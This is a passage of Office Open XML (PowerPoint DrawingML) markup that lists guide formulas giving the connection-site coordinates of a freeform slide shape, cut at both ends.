              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 205369 w 1403195"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 222813 w 1403195"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 236853 w 1403195"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 289810 w 1403195"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 305497 w 1403195"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 349202 w 1403195"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 332425 w 1403195"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 309840 w 1403195"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 317004 w 1403195"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 299749 w 1403195"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 326777 w 1403195"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 304769 w 1403195"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 303567 w 1403195"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 318982 w 1403195"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 306369 w 1403195"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 291598 w 1403195"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 341110 w 1403195"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 320185 w 1403195"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 359777 w 1403195"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 406907 w 1403195"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 420475 w 1403195"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 436456 w 1403195"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 469949 w 1403195"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 479548 w 1403195"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 490774 w 1403195"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 491794 w 1403195"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 499135 w 1403195"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 502438 w 1403195"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 503422 w 1403195"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 499056 w 1403195"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 505733 w 1403195"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 502666 w 1403195"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 509496 w 1403195"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 516532 w 1403195"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 519263 w 1403195"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 515967 w 1403195"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 517521 w 1403195"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 524430 w 1403195"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 520286 w 1403195"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 535689 w 1403195"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 541592 w 1403195"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 546325 w 1403195"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 547618 w 1403195"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 545425 w 1403195"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 540905 w 1403195"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 535988 w 1403195"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 532553 w 1403195"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 513206 w 1403195"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 517279 w 1403195"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 502535 w 1403195"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 503684 w 1403195"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 502260 w 1403195"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 488555 w 1403195"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 490153 w 1403195"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483575 w 1403195"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484906 w 1403195"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 489260 w 1403195"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 494338 w 1403195"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 516932 w 1403195"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 516357 w 1403195"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 516664 w 1403195"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 516691 w 1403195"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 515306 w 1403195"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 514190 w 1403195"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 515923 w 1403195"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 519666 w 1403195"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 519132 w 1403195"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 527828 w 1403195"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 535174 w 1403195"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 534470 w 1403195"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 537913 w 1403195"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 545451 w 1403195"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 547122 w 1403195"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 564685 w 1403195"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 565110 w 1403195"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 566933 w 1403195"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 553768 w 1403195"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 554269 w 1403195"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 541869 w 1403195"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 527054 w 1403195"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 527719 w 1403195"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 518587 w 1403195"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 505196 w 1403195"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 477926 w 1403195"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 420540 w 1403195"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 369458 w 1403195"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 349552 w 1403195"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 340275 w 1403195"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 327236 w 1403195"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 333235 w 1403195"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 335847 w 1403195"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 312176 w 1403195"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 302063 w 1403195"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 286280 w 1403195"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 283738 w 1403195"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 284731 w 1403195"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 276537 w 1403195"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 257715 w 1403195"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 234272 w 1403195"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 188071 w 1403195"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 160382 w 1403195"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 159508 w 1403195"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 140303 w 1403195"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 153383 w 1403195"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 146125 w 1403195"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 132210 w 1403195"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 140517 w 1403195"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 141705 w 1403195"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 146390 w 1403195"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 138672 w 1403195"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 127978 w 1403195"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 116714 w 1403195"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 118170 w 1403195"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 120406 w 1403195"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 113035 w 1403195"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 82443 w 1403195"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 61393 w 1403195"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 60951 w 1403195"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 46622 w 1403195"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 32041 w 1403195"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 37052 w 1403195"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 22994 w 1403195"/>
              <a:gd name="connsiteY129" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 22675 w 1403195"/>
              <a:gd name="connsiteY130" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 2301 w 1403195"/>
              <a:gd name="connsiteY131" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 1549 w 1403195"/>
              <a:gd name="connsiteY132" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 90145 w 1403195"/>
              <a:gd name="connsiteY133" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 111655 w 1403195"/>
              <a:gd name="connsiteY134" fmla="*/ 309501 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 95838 w 1403195"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 112865 w 1403195"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 104575 w 1403195"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 116859 w 1403195"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 76413 w 1403195"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 74305 w 1401087"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1401087 w 1401087"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1401087 w 1401087"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 137781 w 1401087"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 174374 w 1401087"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 185874 w 1401087"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 210613 w 1401087"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 188170 w 1401087"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 203261 w 1401087"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 220705 w 1401087"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 234745 w 1401087"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 287702 w 1401087"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 303389 w 1401087"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 347094 w 1401087"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 330317 w 1401087"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 307732 w 1401087"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 314896 w 1401087"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 297641 w 1401087"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 324669 w 1401087"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 302661 w 1401087"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 301459 w 1401087"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 316874 w 1401087"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 304261 w 1401087"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 289490 w 1401087"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 339002 w 1401087"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 318077 w 1401087"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 357669 w 1401087"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 404799 w 1401087"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 418367 w 1401087"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 434348 w 1401087"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 467841 w 1401087"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 477440 w 1401087"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 488666 w 1401087"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 489686 w 1401087"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 497027 w 1401087"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 500330 w 1401087"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 501314 w 1401087"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 496948 w 1401087"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 503625 w 1401087"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 500558 w 1401087"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 507388 w 1401087"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 514424 w 1401087"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 517155 w 1401087"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 513859 w 1401087"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 515413 w 1401087"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 522322 w 1401087"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 518178 w 1401087"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 533581 w 1401087"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 539484 w 1401087"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 544217 w 1401087"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 545510 w 1401087"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 543317 w 1401087"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 538797 w 1401087"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 533880 w 1401087"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 530445 w 1401087"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 511098 w 1401087"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 515171 w 1401087"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 500427 w 1401087"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 501576 w 1401087"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 500152 w 1401087"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 486447 w 1401087"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 488045 w 1401087"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 481467 w 1401087"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 482798 w 1401087"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 487152 w 1401087"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 492230 w 1401087"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 514824 w 1401087"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 514249 w 1401087"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 514556 w 1401087"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 514583 w 1401087"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 513198 w 1401087"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 512082 w 1401087"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 513815 w 1401087"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 517558 w 1401087"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 517024 w 1401087"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 525720 w 1401087"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 533066 w 1401087"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 532362 w 1401087"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 535805 w 1401087"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
